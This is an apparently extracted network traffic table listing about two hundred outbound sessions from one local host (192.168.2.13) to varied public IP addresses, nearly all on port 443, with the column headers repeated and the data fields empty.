                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11504192.168.2.135357080.221.7.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11505192.168.2.1351328143.75.12.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11506192.168.2.1358078134.170.217.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11507192.168.2.133579669.193.85.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11508192.168.2.1335290155.4.208.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11509192.168.2.1350382190.99.223.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11510192.168.2.1346230205.114.145.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11511192.168.2.135815835.123.97.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11512192.168.2.134538061.155.132.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11513192.168.2.1353240103.128.243.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11514192.168.2.1338268132.151.122.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11515192.168.2.1337166179.173.165.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11516192.168.2.134933217.56.255.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11517192.168.2.135476050.59.43.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11518192.168.2.1332932156.201.77.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11519192.168.2.134222288.197.156.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11520192.168.2.135989095.193.52.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11521192.168.2.135852259.209.97.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11522192.168.2.1360568196.152.157.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11523192.168.2.1342700146.50.203.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11524192.168.2.1352542183.124.17.418080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11525192.168.2.1333218162.114.166.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11526192.168.2.1354388155.81.107.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11527192.168.2.133827832.178.162.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11528192.168.2.134393449.87.247.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11529192.168.2.1354180140.141.55.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11530192.168.2.135197481.121.59.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11531192.168.2.1352446132.152.218.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11532192.168.2.1359546161.232.5.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11533192.168.2.1337080110.158.19.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11534192.168.2.1337996100.134.217.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11535192.168.2.1333616153.201.140.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11536192.168.2.134411427.122.79.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11537192.168.2.135640682.15.100.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11538192.168.2.1345822199.251.168.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11539192.168.2.134902269.139.114.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11540192.168.2.13559102.167.170.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11541192.168.2.133414690.70.211.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11542192.168.2.1349062185.160.198.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11543192.168.2.135703235.63.89.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11544192.168.2.1347562110.200.86.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11545192.168.2.1349470204.188.142.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11546192.168.2.1354100201.12.5.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11547192.168.2.134780882.247.92.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11548192.168.2.1342346168.194.230.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11549192.168.2.1336856216.227.169.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11550192.168.2.1360012148.182.149.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11551192.168.2.1339772175.87.232.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11552192.168.2.133762037.65.10.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11553192.168.2.1337770171.236.104.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11554192.168.2.134671640.146.195.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11555192.168.2.1348052184.75.83.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11556192.168.2.13405149.1.148.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11557192.168.2.133591424.38.143.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11558192.168.2.1337840143.151.229.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11559192.168.2.1333654195.1.59.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11560192.168.2.1358570158.200.56.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11561192.168.2.134916692.153.20.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11562192.168.2.133484852.157.250.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11563192.168.2.1343880120.35.219.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11564192.168.2.1351886137.1.22.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11565192.168.2.1349306195.141.192.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11566192.168.2.1358116191.184.5.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11567192.168.2.1341468132.26.19.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11568192.168.2.1341618131.142.70.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11569192.168.2.1353458165.139.93.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11570192.168.2.134190470.44.153.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11571192.168.2.1348848112.85.177.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11572192.168.2.135786631.90.176.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11573192.168.2.135486049.30.203.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11574192.168.2.1356046134.228.70.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11575192.168.2.1351520208.182.33.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11576192.168.2.1332942172.124.104.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11577192.168.2.1338372175.227.249.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11578192.168.2.135810261.96.190.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11579192.168.2.1360406109.164.118.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11580192.168.2.133792620.229.39.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11581192.168.2.135158264.158.246.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11582192.168.2.1350346156.61.38.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11583192.168.2.1334394178.79.97.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11584192.168.2.1342458212.221.90.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11585192.168.2.1341992161.166.162.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11586192.168.2.13359904.199.204.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11587192.168.2.1352184195.200.120.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11588192.168.2.1344788103.198.241.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11589192.168.2.134641444.185.80.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11590192.168.2.13590081.26.14.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11591192.168.2.135100275.175.234.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11592192.168.2.1356804166.45.231.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11593192.168.2.1338904110.245.254.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11594192.168.2.134006890.224.120.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11595192.168.2.1337984128.193.242.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11596192.168.2.1356698101.42.202.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11597192.168.2.1344082184.214.126.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11598192.168.2.136061274.203.25.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11599192.168.2.1343888155.187.246.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11600192.168.2.1346352204.31.243.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11601192.168.2.135621648.95.111.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11602192.168.2.1345922208.223.61.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11603192.168.2.1350800219.39.52.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11604192.168.2.1349346137.225.137.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11605192.168.2.1340368223.131.21.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11606192.168.2.1333906177.111.230.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11607192.168.2.1347320218.65.173.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11608192.168.2.1350818126.143.69.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11609192.168.2.1352934151.129.134.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11610192.168.2.1341160111.113.223.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11611192.168.2.135128869.245.221.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11612192.168.2.134925465.90.98.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11613192.168.2.135890051.20.38.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11614192.168.2.1341668196.43.216.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11615192.168.2.1354978176.104.47.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11616192.168.2.1354112197.178.152.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11617192.168.2.1339478211.70.240.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11618192.168.2.133675674.165.252.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11619192.168.2.13492981.173.168.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11620192.168.2.135603483.4.35.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11621192.168.2.1341768205.129.16.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11622192.168.2.1332910163.11.109.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11623192.168.2.1356336159.186.202.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11624192.168.2.1356154182.65.248.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11625192.168.2.1344946122.244.239.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11626192.168.2.1336308117.176.113.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11627192.168.2.1349048174.214.208.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11628192.168.2.1343566149.37.1.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11629192.168.2.1338752108.49.48.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11630192.168.2.133493064.218.139.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11631192.168.2.1358112209.230.215.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11632192.168.2.134761637.52.161.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11633192.168.2.1353574219.12.211.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11634192.168.2.133389288.58.114.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11635192.168.2.134862646.44.29.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11636192.168.2.135302468.12.123.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11637192.168.2.134057270.69.178.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11638192.168.2.136044062.211.231.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11639192.168.2.135738623.136.57.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11640192.168.2.1343644205.210.87.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11641192.168.2.134795688.84.32.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11642192.168.2.1346716104.23.22.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11643192.168.2.1351678177.253.134.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11644192.168.2.135739693.70.71.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11645192.168.2.1353332180.160.215.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11646192.168.2.134888832.196.168.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11647192.168.2.1338356176.86.168.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11648192.168.2.1342874174.229.203.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11649192.168.2.1358000147.196.217.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11650192.168.2.1337354102.90.155.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11651192.168.2.134770667.125.16.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11652192.168.2.133582050.192.249.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11653192.168.2.1333594117.58.116.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11654192.168.2.1358416139.10.131.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11655192.168.2.135636014.76.124.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11656192.168.2.134580627.54.148.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11657192.168.2.1346246196.225.20.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11658192.168.2.1355278145.147.28.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11659192.168.2.1356384171.202.131.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11660192.168.2.133981067.140.61.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11661192.168.2.1350316162.143.168.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11662192.168.2.133985695.90.160.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11663192.168.2.13542485.171.29.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11664192.168.2.1348220164.231.72.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11665192.168.2.1358430185.32.218.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11666192.168.2.1357610134.205.229.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11667192.168.2.1344582119.142.160.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11668192.168.2.133814834.108.53.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11669192.168.2.1359398145.227.115.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11670192.168.2.1342486130.40.211.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11671192.168.2.1344314114.31.13.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11672192.168.2.133826061.39.158.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11673192.168.2.1347454125.166.242.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11674192.168.2.1357214137.104.162.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11675192.168.2.1358760177.216.4.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11676192.168.2.1333898220.47.11.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11677192.168.2.135442439.27.174.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11678192.168.2.1339790196.114.92.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11679192.168.2.1340330219.214.136.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11680192.168.2.1352578137.22.150.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11681192.168.2.135397483.205.188.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11682192.168.2.136046450.22.79.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11683192.168.2.135836893.44.30.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11684192.168.2.1350524211.114.138.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11685192.168.2.1355516175.141.209.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11686192.168.2.1341004141.231.22.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11687192.168.2.1353698219.154.83.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11688192.168.2.135991618.117.215.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11689192.168.2.1333104218.59.4.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11690192.168.2.1337236126.70.42.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11691192.168.2.1340794195.193.20.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11692192.168.2.133977631.117.138.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11693192.168.2.1354492124.32.162.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11694192.168.2.135162252.205.38.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11695192.168.2.1333368220.211.17.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11696192.168.2.1354046170.198.143.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11697192.168.2.134188240.94.79.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11698192.168.2.134030659.213.207.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11699192.168.2.1349296165.147.208.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11700192.168.2.135195691.222.235.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11701192.168.2.1337258201.17.160.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11702192.168.2.1346614186.43.37.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11703192.168.2.1336200162.149.144.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11704192.168.2.133690247.226.176.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11705192.168.2.1344200199.179.155.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11706192.168.2.1340430139.187.4.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11707192.168.2.1349474212.216.108.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11708192.168.2.1360114217.50.22.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11709192.168.2.1336234118.136.152.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11710192.168.2.1342120142.61.110.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11711192.168.2.134692623.122.168.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11712192.168.2.1359128112.143.21.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11713192.168.2.1345124197.5.24.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11714192.168.2.1345900142.110.117.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11715192.168.2.1350548100.4.41.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11716192.168.2.1356222125.64.219.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11717192.168.2.135605687.233.94.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11718192.168.2.1336486176.220.90.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11719192.168.2.1341428106.45.245.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11720192.168.2.133906657.31.241.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11721192.168.2.1340074173.136.151.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11722192.168.2.1334796181.118.107.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11723192.168.2.1354946134.135.224.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11724192.168.2.135494493.47.168.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
